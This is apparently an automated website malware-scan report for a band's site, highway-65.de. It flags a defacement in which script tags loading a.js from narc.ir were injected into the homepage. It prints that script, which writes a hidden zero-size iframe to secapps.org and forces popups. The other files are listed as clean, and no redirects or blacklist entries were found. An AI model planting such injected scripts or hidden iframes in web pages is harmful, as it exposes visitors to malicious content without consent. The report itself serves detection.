Scanned pages/files
Request | Server response | Status |
http://highway-65.de/ | 200 OK Content-Length: 23093 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: !--Hacked by -- <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <!--Hacked by --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" > <head> <base href="http://highway-65.de/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta ...[28542 bytes skipped]... | ||
http://narc.ir/mtp1376/secapps/a.js | 200 OK Content-Length: 2120 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="0" height="0" src="http://www.secapps.org/"></iframe>'); var needpopupfck = 1; var vc_cn = "__popUp"; var link = "http://www.secapps.org/"; if (readCookiefck(vc_cn)&&readCookiefck(vc_cn)==2) { needpopupfck = 0; }else{ needpopupfck = 1; } var Page_Popped_fck = false; var Page_Loaded_fck = false; var Page_Enter_fck; if (needpopupfck == 1) { InitPopfck(); } function InitPopf window.open('javascript:void(0)', '_parent','toolbar=1,location=1,directories=1,status=1,menubar=1,scrollbars=1,resizable=1'); window.focus(); if(window.open(link,'_blank','toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1')){ window.focus(); IncrementCountfck(); } else { window.focus(); if (Page_Loaded_fck) initAdLayer(); else XBrowserAddHandlerPops(window, "load", "initAdLayer") } } } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.secapps.org/ <iframe width="0" height="0" src="http://www.secapps.org/"> | ||
http://highway-65.de/components/com_jfbconnect/includes/jfbconnect.js | 200 OK Content-Length: 6553 Content-Type: application/javascript | clean |
http://highway-65.de/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/jquery.js | 200 OK Content-Length: 55805 Content-Type: application/javascript | clean |
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/jquery.event.hover.js | 200 OK Content-Length: 3595 Content-Type: application/javascript | clean |
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/superfish.js | 200 OK Content-Length: 3959 Content-Type: application/javascript | clean |
http://highway-65.de/templates/tbc_fivepoint_unity/sifr.js | 200 OK Content-Length: 10361 Content-Type: application/javascript | clean |
http://highway-65.de/modules/mod_analytics/gatr.js | 200 OK Content-Length: 2019 Content-Type: application/javascript | clean |
http://highway-65.de/termine | 200 OK Content-Length: 10166 Content-Type: text/html | clean |
http://highway-65.de/band | 200 OK Content-Length: 10484 Content-Type: text/html | clean |
http://highway-65.de/band/fibi | 200 OK Content-Length: 10107 Content-Type: text/html | clean |
http://highway-65.de/band/jey | 200 OK Content-Length: 45366 Content-Type: text/html | clean |
http://highway-65.de/band/beiz | 200 OK Content-Length: 66299 Content-Type: text/html | clean |
http://highway-65.de/band/bully | 200 OK Content-Length: 10482 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: highway-65.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 18 Jun 2014 06:36:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: highway-65.de
Referer: http://www.google.com/search?q=highway-65.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=highway-65.de
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://highway-65.de/
Result: highway-65.de is not infected or malware details are not published yet.